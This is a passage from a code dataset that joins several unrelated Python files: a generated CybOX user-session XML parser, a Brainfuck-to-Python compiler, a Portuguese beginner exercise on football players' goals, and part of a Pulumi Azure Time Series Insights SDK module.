## exit_msg = 'Leaving Interpreter, back to program.')
# Then use the following line where and when you want to drop into the
# IPython shell:
# ipshell('<some message> -- Entering ipshell.\nHit Ctrl-D to exit')
#
# Globals
#
ExternalEncoding = 'utf-8'
Tag_pattern_ = re_.compile(r'({.*})?(.*)')
String_cleanup_pat_ = re_.compile(r"[\n\r\s]+")
Namespace_extract_pat_ = re_.compile(r'{(.*)}(.*)')
#
# Support/utility functions.
#
def showIndent(lwrite, level, pretty_print=True):
if pretty_print:
lwrite(' ' * level)
def quote_xml(inStr):
if not inStr:
return ''
s1 = (isinstance(inStr, basestring) and inStr or
'%s' % inStr)
s1 = s1.replace('&', '&')
s1 = s1.replace('<', '<')
s1 = s1.replace('>', '>')
return unicode(s1).encode(ExternalEncoding)
def quote_attrib(inStr):
s1 = (isinstance(inStr, basestring) and inStr or
'%s' % inStr)
s1 = s1.replace('&', '&')
s1 = s1.replace('<', '<')
s1 = s1.replace('>', '>')
if '"' in s1:
if "'" in s1:
s1 = '"%s"' % s1.replace('"', """)
else:
s1 = "'%s'" % s1
else:
s1 = '"%s"' % s1
return unicode(s1).encode(ExternalEncoding)
def quote_python(inStr):
s1 = inStr
if s1.find("'") == -1:
if s1.find('\n') == -1:
return "'%s'" % s1
else:
return "'''%s'''" % s1
else:
if s1.find('"') != -1:
s1 = s1.replace('"', '\\"')
if s1.find('\n') == -1:
return '"%s"' % s1
else:
return '"""%s"""' % s1
def get_all_text_(node):
if node.text is not None:
text = node.text
else:
text = ''
for child in node:
if child.tail is not None:
text += child.tail
return text
def find_attr_value_(attr_name, node):
attrs = node.attrib
attr_parts = attr_name.split(':')
value = None
if len(attr_parts) == 1:
value = attrs.get(attr_name)
elif len(attr_parts) == 2:
prefix, name = attr_parts
namespace = node.nsmap.get(prefix)
if namespace is not None:
value = attrs.get('{%s}%s' % (namespace, name, ))
return value
class GDSParseError(Exception):
pass
def raise_parse_error(node, msg):
if XMLParser_import_library == XMLParser_import_lxml:
msg = '%s (element %s/line %d)' % (
msg, node.tag, node.sourceline, )
else:
msg = '%s (element %s)' % (msg, node.tag, )
raise GDSParseError(msg)
class MixedContainer:
# Constants for category:
CategoryNone = 0
CategoryText = 1
CategorySimple = 2
CategoryComplex = 3
# Constants for content_type:
TypeNone = 0
TypeText = 1
TypeString = 2
TypeInteger = 3
TypeFloat = 4
TypeDecimal = 5
TypeDouble = 6
TypeBoolean = 7
TypeBase64 = 8
def __init__(self, category, content_type, name, value):
self.category = category
self.content_type = content_type
self.name = name
self.value = value
def getCategory(self):
return self.category
def getContenttype(self, content_type):
return self.content_type
def getValue(self):
return self.value
def getName(self):
return self.name
def export(self, lwrite, level, name, namespace, pretty_print=True):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
lwrite(self.value)
elif self.category == MixedContainer.CategorySimple:
self.exportSimple(lwrite, level, name)
else: # category == MixedContainer.CategoryComplex
self.value.export(lwrite, level, namespace, name, pretty_print)
def exportSimple(self, lwrite, level, name):
if self.content_type == MixedContainer.TypeString:
lwrite('<%s>%s</%s>' %
(self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeInteger or \
self.content_type == MixedContainer.TypeBoolean:
lwrite('<%s>%d</%s>' %
(self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeFloat or \
self.content_type == MixedContainer.TypeDecimal:
lwrite('<%s>%f</%s>' %
(self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeDouble:
lwrite('<%s>%g</%s>' %
(self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeBase64:
lwrite('<%s>%s</%s>' %
(self.name, base64.b64encode(self.value), self.name))
def to_etree(self, element):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
if len(element) > 0:
if element[-1].tail is None:
element[-1].tail = self.value
else:
element[-1].tail += self.value
else:
if element.text is None:
element.text = self.value
else:
element.text += self.value
elif self.category == MixedContainer.CategorySimple:
subelement = etree_.SubElement(element, '%s' % self.name)
subelement.text = self.to_etree_simple()
else: # category == MixedContainer.CategoryComplex
self.value.to_etree(element)
def to_etree_simple(self):
if self.content_type == MixedContainer.TypeString:
text = self.value
elif (self.content_type == MixedContainer.TypeInteger or
self.content_type == MixedContainer.TypeBoolean):
text = '%d' % self.value
elif (self.content_type == MixedContainer.TypeFloat or
self.content_type == MixedContainer.TypeDecimal):
text = '%f' % self.value
elif self.content_type == MixedContainer.TypeDouble:
text = '%g' % self.value
elif self.content_type == MixedContainer.TypeBase64:
text = '%s' % base64.b64encode(self.value)
return text
def exportLiteral(self, lwrite, level, name):
if self.category == MixedContainer.CategoryText:
showIndent(lwrite, level)
lwrite('model_.MixedContainer(%d, %d, "%s", "%s"),\n'
% (self.category, self.content_type, self.name, self.value))
elif self.category == MixedContainer.CategorySimple:
showIndent(lwrite, level)
lwrite('model_.MixedContainer(%d, %d, "%s", "%s"),\n'
% (self.category, self.content_type, self.name, self.value))
else: # category == MixedContainer.CategoryComplex
showIndent(lwrite, level)
lwrite('model_.MixedContainer(%d, %d, "%s",\n' % \
(self.category, self.content_type, self.name,))
self.value.exportLiteral(lwrite, level + 1)
showIndent(lwrite, level)
lwrite(')\n')
class MemberSpec_(object):
def __init__(self, name='', data_type='', container=0):
self.name = name
self.data_type = data_type
self.container = container
def set_name(self, name): self.name = name
def get_name(self): return self.name
def set_data_type(self, data_type): self.data_type = data_type
def get_data_type_chain(self): return self.data_type
def get_data_type(self):
if isinstance(self.data_type, list):
if len(self.data_type) > 0:
return self.data_type[-1]
else:
return 'xs:string'
else:
return self.data_type
def set_container(self, container): self.container = container
def get_container(self): return self.container
def _cast(typ, value):
if typ is None or value is None:
return value
return typ(value)
#
# Data representation classes.
#
class UserSessionObjectType(cybox_common.ObjectPropertiesType):
"""The UserSessionObjectType type is intended to characterize user
sessions."""
subclass = None
superclass = cybox_common.ObjectPropertiesType
def __init__(self, object_reference=None, Custom_Properties=None, xsi_type=None, Effective_Group=None, Effective_Group_ID=None, Effective_User=None, Effective_User_ID=None, Login_Time=None, Logout_Time=None):
super(UserSessionObjectType, self).__init__(object_reference, Custom_Properties, xsi_type )
self.Effective_Group = Effective_Group
self.Effective_Group_ID = Effective_Group_ID
self.Effective_User = Effective_User
self.Effective_User_ID = Effective_User_ID
self.Login_Time = Login_Time
self.Logout_Time = Logout_Time
def factory(*args_, **kwargs_):
if UserSessionObjectType.subclass:
return UserSessionObjectType.subclass(*args_, **kwargs_)
else:
return UserSessionObjectType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Effective_Group(self): return self.Effective_Group
def set_Effective_Group(self, Effective_Group): self.Effective_Group = Effective_Group
def validate_StringObjectPropertyType(self, value):
# Validate type cybox_common.StringObjectPropertyType, a restriction on None.
pass
def get_Effective_Group_ID(self): return self.Effective_Group_ID
def set_Effective_Group_ID(self, Effective_Group_ID): self.Effective_Group_ID = Effective_Group_ID
def get_Effective_User(self): return self.Effective_User
def set_Effective_User(self, Effective_User): self.Effective_User = Effective_User
def get_Effective_User_ID(self): return self.Effective_User_ID
def set_Effective_User_ID(self, Effective_User_ID): self.Effective_User_ID = Effective_User_ID
def get_Login_Time(self): return self.Login_Time
def set_Login_Time(self, Login_Time): self.Login_Time = Login_Time
def validate_DateTimeObjectPropertyType(self, value):
# Validate type cybox_common.DateTimeObjectPropertyType, a restriction on None.
pass
def get_Logout_Time(self): return self.Logout_Time
def set_Logout_Time(self, Logout_Time): self.Logout_Time = Logout_Time
def hasContent_(self):
if (
self.Effective_Group is not None or
self.Effective_Group_ID is not None or
self.Effective_User is not None or
self.Effective_User_ID is not None or
self.Login_Time is not None or
self.Logout_Time is not None or
super(UserSessionObjectType, self).hasContent_()
):
return True
else:
return False
def export(self, lwrite, level, namespace_='UserSessionObj:', name_='UserSessionObjectType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(lwrite, level, pretty_print)
lwrite('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(lwrite, level, already_processed, namespace_, name_='UserSessionObjectType')
if self.hasContent_():
lwrite('>%s' % (eol_, ))
self.exportChildren(lwrite, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(lwrite, level, pretty_print)
lwrite('</%s%s>%s' % (namespace_, name_, eol_))
else:
lwrite('/>%s' % (eol_, ))
def exportAttributes(self, lwrite, level, already_processed, namespace_='UserSessionObj:', name_='UserSessionObjectType'):
super(UserSessionObjectType, self).exportAttributes(lwrite, level, already_processed, namespace_, name_='UserSessionObjectType')
def exportChildren(self, lwrite, level, namespace_='UserSessionObj:', name_='UserSessionObjectType', fromsubclass_=False, pretty_print=True):
super(UserSessionObjectType, self).exportChildren(lwrite, level, 'UserSessionObj:', name_, True, pretty_print=pretty_print)
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.Effective_Group is not None:
self.Effective_Group.export(lwrite, level, 'UserSessionObj:', name_='Effective_Group', pretty_print=pretty_print)
if self.Effective_Group_ID is not None:
self.Effective_Group_ID.export(lwrite, level, 'UserSessionObj:', name_='Effective_Group_ID', pretty_print=pretty_print)
if self.Effective_User is not None:
self.Effective_User.export(lwrite, level, 'UserSessionObj:', name_='Effective_User', pretty_print=pretty_print)
if self.Effective_User_ID is not None:
self.Effective_User_ID.export(lwrite, level, 'UserSessionObj:', name_='Effective_User_ID', pretty_print=pretty_print)
if self.Login_Time is not None:
self.Login_Time.export(lwrite, level, 'UserSessionObj:', name_='Login_Time', pretty_print=pretty_print)
if self.Logout_Time is not None:
self.Logout_Time.export(lwrite, level, 'UserSessionObj:', name_='Logout_Time', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
super(UserSessionObjectType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Effective_Group':
obj_ = cybox_common.StringObjectPropertyType.factory()
obj_.build(child_)
self.set_Effective_Group(obj_)
elif nodeName_ == 'Effective_Group_ID':
obj_ = cybox_common.StringObjectPropertyType.factory()
obj_.build(child_)
self.set_Effective_Group_ID(obj_)
elif nodeName_ == 'Effective_User':
obj_ = cybox_common.StringObjectPropertyType.factory()
obj_.build(child_)
self.set_Effective_User(obj_)
elif nodeName_ == 'Effective_User_ID':
obj_ = cybox_common.StringObjectPropertyType.factory()
obj_.build(child_)
self.set_Effective_User_ID(obj_)
elif nodeName_ == 'Login_Time':
obj_ = cybox_common.DateTimeObjectPropertyType.factory()
obj_.build(child_)
self.set_Login_Time(obj_)
elif nodeName_ == 'Logout_Time':
obj_ = cybox_common.DateTimeObjectPropertyType.factory()
obj_.build(child_)
self.set_Logout_Time(obj_)
super(UserSessionObjectType, self).buildChildren(child_, node, nodeName_, True)
# end class UserSessionObjectType
GDSClassesMapping = {
'Build_Utility': cybox_common.BuildUtilityType,
'Errors': cybox_common.ErrorsType,
'Search_Distance': cybox_common.IntegerObjectPropertyType,
'Error': cybox_common.ErrorType,
'Certificate_Issuer': cybox_common.StringObjectPropertyType,
'Metadata': cybox_common.MetadataType,
'Hash': cybox_common.HashType,
'Information_Source_Type': cybox_common.ControlledVocabularyStringType,
'Block_Hash_Value': cybox_common.HashValueType,
'Fuzzy_Hash_Structure': cybox_common.FuzzyHashStructureType,
'SubDatum': cybox_common.MetadataType,
'Segment_Hash': cybox_common.HashValueType,
'Digital_Signature': cybox_common.DigitalSignatureInfoType,
'Code_Snippets': cybox_common.CodeSnippetsType,
'Value': cybox_common.StringObjectPropertyType,
'Length': cybox_common.IntegerObjectPropertyType,
'Encoding': cybox_common.ControlledVocabularyStringType,
'Internationalization_Settings': cybox_common.InternationalizationSettingsType,
'Tool_Configuration': cybox_common.ToolConfigurationType,
'Compiler': cybox_common.CompilerType,
'Functions': cybox_common.FunctionsType,
'String_Value': cybox_common.StringObjectPropertyType,
'Build_Utility_Platform_Specification': cybox_common.PlatformSpecificationType,
'Compiler_Informal_Description': cybox_common.CompilerInformalDescriptionType,
'System': cybox_common.ObjectPropertiesType,
'Platform': cybox_common.PlatformSpecificationType,
'Usage_Context_Assumptions': cybox_common.UsageContextAssumptionsType,
'Type': cybox_common.ControlledVocabularyStringType,
'Compilers': cybox_common.CompilersType,
'Tool_Type': cybox_common.ControlledVocabularyStringType,
'String': cybox_common.ExtractedStringType,
'Tool': cybox_common.ToolInformationType,
'Build_Information': cybox_common.BuildInformationType,
'Tool_Hashes': cybox_common.HashListType,
'Login_Time': cybox_common.DateTimeObjectPropertyType,
'Error_Instances': cybox_common.ErrorInstancesType,
'Logout_Time': cybox_common.DateTimeObjectPropertyType,
'Data_Segment': cybox_common.StringObjectPropertyType,
'Certificate_Subject': cybox_common.StringObjectPropertyType,
'Language': cybox_common.StringObjectPropertyType,
'Property': cybox_common.PropertyType,
'Strings': cybox_common.ExtractedStringsType,
'Effective_User_ID': cybox_common.StringObjectPropertyType,
'File_System_Offset': cybox_common.IntegerObjectPropertyType,
'Effective_Group': cybox_common.StringObjectPropertyType,
'Reference_Description': cybox_common.StructuredTextType,
'Code_Snippet': cybox_common.ObjectPropertiesType,
'Configuration_Settings': cybox_common.ConfigurationSettingsType,
'Simple_Hash_Value': cybox_common.SimpleHashValueType,
'Byte_String_Value': cybox_common.HexBinaryObjectPropertyType,
'Instance': cybox_common.ObjectPropertiesType,
'Import': cybox_common.StringObjectPropertyType,
'Identifier': cybox_common.PlatformIdentifierType,
'Tool_Specific_Data': cybox_common.ToolSpecificDataType,
'Execution_Environment': cybox_common.ExecutionEnvironmentType,
'Effective_User': cybox_common.StringObjectPropertyType,
'Dependencies': cybox_common.DependenciesType,
'Offset': cybox_common.IntegerObjectPropertyType,
'Date': cybox_common.DateRangeType,
'Hashes': cybox_common.HashListType,
'Segments': cybox_common.HashSegmentsType,
'Segment_Count': cybox_common.IntegerObjectPropertyType,
'Usage_Context_Assumption': cybox_common.StructuredTextType,
'Block_Hash': cybox_common.FuzzyHashBlockType,
'Dependency': cybox_common.DependencyType,
'Effective_Group_ID': cybox_common.StringObjectPropertyType,
'Trigger_Point': cybox_common.HexBinaryObjectPropertyType,
'Environment_Variable': cybox_common.EnvironmentVariableType,
'Byte_Run': cybox_common.ByteRunType,
'Contributors': cybox_common.PersonnelType,
'Image_Offset': cybox_common.IntegerObjectPropertyType,
'Imports': cybox_common.ImportsType,
'Library': cybox_common.LibraryType,
'References': cybox_common.ToolReferencesType,
'Internal_Strings': cybox_common.InternalStringsType,
'Time': cybox_common.TimeType,
'Custom_Properties': cybox_common.CustomPropertiesType,
'Configuration_Setting': cybox_common.ConfigurationSettingType,
'Libraries': cybox_common.LibrariesType,
'Function': cybox_common.StringObjectPropertyType,
'Description': cybox_common.StructuredTextType,
'User_Account_Info': cybox_common.ObjectPropertiesType,
'Build_Configuration': cybox_common.BuildConfigurationType,
'Address': cybox_common.HexBinaryObjectPropertyType,
'Search_Within': cybox_common.IntegerObjectPropertyType,
'Segment': cybox_common.HashSegmentType,
'English_Translation': cybox_common.StringObjectPropertyType,
'Name': cybox_common.StringObjectPropertyType,
'Signature_Description': cybox_common.StringObjectPropertyType,
'Block_Size': cybox_common.IntegerObjectPropertyType,
'Compiler_Platform_Specification': cybox_common.PlatformSpecificationType,
'Fuzzy_Hash_Value': cybox_common.FuzzyHashValueType,
'Dependency_Description': cybox_common.StructuredTextType,
'Contributor': cybox_common.ContributorType,
'Tools': cybox_common.ToolsInformationType,
'Data_Size': cybox_common.DataSizeType,
}
USAGE_TEXT = """
Usage: python <Parser>.py [ -s ] <in_xml_file>
"""
def usage():
print USAGE_TEXT
sys.exit(1)
def get_root_tag(node):
tag = Tag_pattern_.match(node.tag).groups()[-1]
rootClass = GDSClassesMapping.get(tag)
if rootClass is None:
rootClass = globals().get(tag)
return tag, rootClass
def parse(inFileName):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'User_Session'
rootClass = UserSessionObjectType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
# sys.stdout.write('<?xml version="1.0" ?>\n')
# rootObj.export(sys.stdout.write, 0, name_=rootTag,
# namespacedef_='',
# pretty_print=True)
return rootObj
def parseEtree(inFileName):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'User_Session'
rootClass = UserSessionObjectType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
rootElement = rootObj.to_etree(None, name_=rootTag)
content = etree_.tostring(rootElement, pretty_print=True,
xml_declaration=True, encoding="utf-8")
sys.stdout.write(content)
sys.stdout.write('\n')
return rootObj, rootElement
def parseString(inString):
from StringIO import StringIO
doc = parsexml_(StringIO(inString))
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'User_Session'
rootClass = UserSessionObjectType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
# sys.stdout.write('<?xml version="1.0" ?>\n')
# rootObj.export(sys.stdout.write, 0, name_="User_Session",
# namespacedef_='')
return rootObj
def main():
args = sys.argv[1:]
if len(args) == 1:
parse(args[0])
else:
usage()
if __name__ == '__main__':
#import pdb; pdb.set_trace()
main()
__all__ = [
"UserSessionObjectType"
]
| 42.239709 | 212 | 0.628919 |
bdbeae8c5e94063442dd245fc2d7640bd6810f7e | 45 | py | Python | sneakers/exceptions.py | rsolanoweb/sneakers-archive | a71e67511e501e21fbc0ec7ac1cd940740d4aa11 | [
"MIT"
] | null | null | null | sneakers/exceptions.py | rsolanoweb/sneakers-archive | a71e67511e501e21fbc0ec7ac1cd940740d4aa11 | [
"MIT"
] | null | null | null | sneakers/exceptions.py | rsolanoweb/sneakers-archive | a71e67511e501e21fbc0ec7ac1cd940740d4aa11 | [
"MIT"
] | null | null | null | class BrandDoesNotExist(Exception):
pass
| 15 | 35 | 0.777778 |
7e14ef905e9eeefb6a6c81832438f8081ae17dc0 | 4,912 | py | Python | bftools/compiler.py | BobDotCom/bftools | 6b3e0e55f2e5154f5d48d9606ac18833120c1420 | [
"MIT"
] | 1 | 2022-02-02T19:22:49.000Z | 2022-02-02T19:22:49.000Z | bftools/compiler.py | BobDotCom/bftools | 6b3e0e55f2e5154f5d48d9606ac18833120c1420 | [
"MIT"
] | 1 | 2021-11-21T05:03:59.000Z | 2022-03-20T00:42:19.000Z | bftools/compiler.py | BobDotCom/bftools | 6b3e0e55f2e5154f5d48d9606ac18833120c1420 | [
"MIT"
] | null | null | null | import warnings
from typing import List, Tuple, Optional
from .enums import Symbol, Code
class CompiledBrainfuck:
def __init__(self) -> None:
"""An object to represent python compiled from Brainfuck. To recieve the decoded text, use :attr:`result` or
str(:class:`DecodedBrainfuck`).
.. warning::
This class is not intended to be instantiated directly. Use :meth:`decode` or :meth:`BrainfuckTools.decode`
instead.
Attributes
----------
result: Optional[str]
The result code. This will never be ``None`` unless :meth:`parse` has not been called. Since the library
always calls :meth:`parse` before returning the object, this should never happen unless you override the
functionality of the library.
"""
self._raw_parsed: Optional[List[Symbol]] = []
self.result: Optional[str] = None
def __str__(self) -> str:
return self.result
@property
def code(self) -> Optional[str]:
"""The compiled code.
.. deprecated:: 0.3.0
The code property is deprecated and will be removed in 0.5.0. Use :attr:`result` or
str(:class:`CompiledBrainfuck`) instead.
Returns
-------
Optional[str]
The compiled code. This will never be ``None`` unless :meth:`parse` has not been called. Since the library
always calls :meth:`parse` before returning the object, this should never happen unless you override the
functionality of the library.
"""
warnings.warn("The text property is deprecated since 0.3.0 and will be removed in 0.5.0. Use "
"DecodedBrainfuck.result or str(DecodedBrainfuck) instead.", DeprecationWarning, stacklevel=2)
return self.result
@property
def raw_parsed(self) -> Optional[Tuple[Symbol]]:
"""
Raw parsed code. This will never be ``None`` unless :meth:`parse` has not been called. Since the library
always calls :meth:`parse` before returning the object, this should never happen unless you override the
functionality of the library.
.. note::
This is meant to be used internally and you should not need to use it.
.. versionchanged:: 0.3.0
Now returns ``None`` instead of raising a ValueError.
Returns
-------
Optional[Tuple[Symbol]]
The raw parsed code.
"""
if self._raw_parsed is None:
return None
return tuple(self._raw_parsed)
def parse(self, code: str) -> None:
"""Parse the given code.
.. note::
You should not need to use this method. It is intended for internal use only, so you should only need to use
it if you override the functionality of the library. This method is not dangerous like
:meth:`DecodedBrainfuck.parse` is.
Parameters
----------
code: str
The code to parse.
"""
self._raw_parsed = []
for character in code:
try:
parsed = Symbol(character)
self._raw_parsed.append(parsed)
except ValueError: # TODO: add support for comments
# Since comments are not supported yet, let's just skip for now
continue
self.result = """
main = bytearray(30000)
position = 0
"""
indentation = 0
stackable = (Symbol.SHIFTLEFT, Symbol.SHIFTRIGHT, Symbol.ADD, Symbol.SUBTRACT)
stack_level = 0
stack_type = None
for symbol in self.raw_parsed:
if symbol in stackable and stack_type == symbol:
stack_level += 1
stack_type = symbol
continue
else:
if stack_level > 0:
self.result += f"\n{' ' * 4 * indentation}{Code[stack_type.name].value.format(stack_level)}"
stack_level = 0
if symbol in stackable:
stack_level += 1
stack_type = symbol
continue
self.result += f"\n{' ' * 4 * indentation}{Code[symbol.name].value}"
if symbol == Symbol.STARTLOOP:
indentation += 1
elif symbol == Symbol.ENDLOOP:
indentation -= 1
try:
import python_minifier
except ImportError:
class Minifier:
@staticmethod
def minify(c: str, **kwargs) -> str:
return c
python_minifier = Minifier
self.result = python_minifier.minify(
self.result,
remove_literal_statements=True,
rename_globals=True,
)
self.result = "# Compiled using bftools (https://github.com/BobDotCom/bftools)\n" + self.result
| 37.212121 | 120 | 0.573901 |
526256609c1e54792efa138bca96da4d26d76bb9 | 1,305 | py | Python | ex095.py | CarlosEduardoAS/Python-exercicios | c0063660191a86e83f25708239b62b6764a51670 | [
"MIT"
] | null | null | null | ex095.py | CarlosEduardoAS/Python-exercicios | c0063660191a86e83f25708239b62b6764a51670 | [
"MIT"
] | null | null | null | ex095.py | CarlosEduardoAS/Python-exercicios | c0063660191a86e83f25708239b62b6764a51670 | [
"MIT"
] | null | null | null | jogador = {}
lista = []
while True:
jogador.clear()
print('---'*11)
jogador['nome'] = str(input('Nome do jogador: ')).strip().capitalize()
np = int(input(f'Quantas partidas {jogador["nome"]} jogou? '))
gols = []
tot = 0
for c in range(0, np):
g = (int(input(f'Quantos gols na {c+1}º partida? ')))
gols.append(g)
tot += g
jogador['gols'] = gols
jogador['total'] = tot
lista.append(jogador.copy())
op = ' '
while op not in 'sn':
op = str(input('Quer continuar? [S/N] ')).lower()[0]
if op == 'n':
break
print('-='*30)
print('cod ', end='')
for i in jogador.keys():
print(f'{i:<15}', end='')
print()
print('---'*13)
for k, v in enumerate(lista):
print(f'{k:>3} ', end='')
for d in v.values():
print(f'{str(d):<15}', end='')
print()
print('---'*13)
while True:
busca = int(input('Mostrar dados de qual jogador? (999 para parar) '))
if busca == 999:
break
if busca >= len(lista):
print(f'ERRO! Não existe jogador com códico {busca}.')
else:
print(f' -- LEVANTAMENTO DO JOGADOR {lista[busca]["nome"]}:')
for i, g in enumerate(lista[busca]['gols']):
print(f' No jogo {i+1} fez {g} gols.')
print('-'*40)
print('<< VOLTE SEMPRE >>') | 29 | 74 | 0.527203 |
d14470ab7dfa31c657a382a082295b76321b6649 | 21,699 | py | Python | sdk/python/pulumi_azure_native/timeseriesinsights/gen1_environment.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/timeseriesinsights/gen1_environment.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/timeseriesinsights/gen1_environment.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['Gen1EnvironmentArgs', 'Gen1Environment']
@pulumi.input_type
class Gen1EnvironmentArgs:
def __init__(__self__, *,
data_retention_time: pulumi.Input[str],
kind: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
sku: pulumi.Input['SkuArgs'],
environment_name: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
partition_key_properties: Optional[pulumi.Input[Sequence[pulumi.Input['TimeSeriesIdPropertyArgs']]]] = None,
storage_limit_exceeded_behavior: Optional[pulumi.Input[Union[str, 'StorageLimitExceededBehavior']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a Gen1Environment resource.
:param pulumi.Input[str] data_retention_time: ISO8601 timespan specifying the minimum number of days the environment's events will be available for query.
:param pulumi.Input[str] kind: The kind of the environment.
Expected value is 'Gen1'.
:param pulumi.Input[str] resource_group_name: Name of an Azure Resource group.
:param pulumi.Input['SkuArgs'] sku: The sku determines the type of environment, either Gen1 (S1 or S2) or Gen2 (L1). For Gen1 environments the sku determines the capacity of the environment, the ingress rate, and the billing rate.
:param pulumi.Input[str] environment_name: Name of the environment
:param pulumi.Input[str] location: The location of the resource.
:param pulumi.Input[Sequence[pulumi.Input['TimeSeriesIdPropertyArgs']]] partition_key_properties: The list of event properties which will be used to partition data in the environment. Currently, only a single partition key property is supported.
:param pulumi.Input[Union[str, 'StorageLimitExceededBehavior']] storage_limit_exceeded_behavior: The behavior the Time Series Insights service should take when the environment's capacity has been exceeded. If "PauseIngress" is specified, new events will not be read from the event source. If "PurgeOldData" is specified, new events will continue to be read and old events will be deleted from the environment. The default behavior is PurgeOldData.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value pairs of additional properties for the resource.
"""
pulumi.set(__self__, "data_retention_time", data_retention_time)
pulumi.set(__self__, "kind", 'Gen1')
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "sku", sku)
if environment_name is not None:
pulumi.set(__self__, "environment_name", environment_name)
if location is not None:
pulumi.set(__self__, "location", location)
if partition_key_properties is not None:
pulumi.set(__self__, "partition_key_properties", partition_key_properties)
if storage_limit_exceeded_behavior is not None:
pulumi.set(__self__, "storage_limit_exceeded_behavior", storage_limit_exceeded_behavior)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="dataRetentionTime")
def data_retention_time(self) -> pulumi.Input[str]:
"""
ISO8601 timespan specifying the minimum number of days the environment's events will be available for query.
"""
return pulumi.get(self, "data_retention_time")
@data_retention_time.setter
def data_retention_time(self, value: pulumi.Input[str]):
pulumi.set(self, "data_retention_time", value)
@property
@pulumi.getter
def kind(self) -> pulumi.Input[str]:
"""
The kind of the environment.
Expected value is 'Gen1'.
"""
return pulumi.get(self, "kind")
@kind.setter
def kind(self, value: pulumi.Input[str]):
pulumi.set(self, "kind", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
Name of an Azure Resource group.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def sku(self) -> pulumi.Input['SkuArgs']:
"""
The sku determines the type of environment, either Gen1 (S1 or S2) or Gen2 (L1). For Gen1 environments the sku determines the capacity of the environment, the ingress rate, and the billing rate.
"""
return pulumi.get(self, "sku")
@sku.setter
def sku(self, value: pulumi.Input['SkuArgs']):
pulumi.set(self, "sku", value)
@property
@pulumi.getter(name="environmentName")
def environment_name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the environment
"""
return pulumi.get(self, "environment_name")
@environment_name.setter
def environment_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "environment_name", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The location of the resource.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="partitionKeyProperties")
def partition_key_properties(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TimeSeriesIdPropertyArgs']]]]:
"""
The list of event properties which will be used to partition data in the environment. Currently, only a single partition key property is supported.
"""
return pulumi.get(self, "partition_key_properties")
@partition_key_properties.setter
def partition_key_properties(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TimeSeriesIdPropertyArgs']]]]):
pulumi.set(self, "partition_key_properties", value)
@property
@pulumi.getter(name="storageLimitExceededBehavior")
def storage_limit_exceeded_behavior(self) -> Optional[pulumi.Input[Union[str, 'StorageLimitExceededBehavior']]]:
"""
The behavior the Time Series Insights service should take when the environment's capacity has been exceeded. If "PauseIngress" is specified, new events will not be read from the event source. If "PurgeOldData" is specified, new events will continue to be read and old events will be deleted from the environment. The default behavior is PurgeOldData.
"""
return pulumi.get(self, "storage_limit_exceeded_behavior")
@storage_limit_exceeded_behavior.setter
def storage_limit_exceeded_behavior(self, value: Optional[pulumi.Input[Union[str, 'StorageLimitExceededBehavior']]]):
pulumi.set(self, "storage_limit_exceeded_behavior", value)
@property
@pulumi.getter
